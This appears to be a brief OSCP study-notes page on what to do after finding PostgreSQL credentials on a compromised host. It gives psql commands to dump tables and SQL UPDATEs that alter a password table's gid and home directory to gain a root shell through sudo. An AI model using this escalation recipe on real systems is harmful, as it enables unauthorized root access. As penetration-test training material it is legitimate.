O
O
OSCP Notes
Search
K
Comment on page

Postgress creds found?

On the victim's machine, run
psql -d unix(database-name) UserNAME -h localhost
Run,\dt to show tables.
run
:select * from table_name;
---
Trick to get root shell:
update passwd_table set gid=0 where gid=1000;
update passwd_table set homedir='/root' where homedir='/var/jail/home';
Then run sudo -s to impersonate as a root account

cat /etc/group | grep sudo to verify the gid!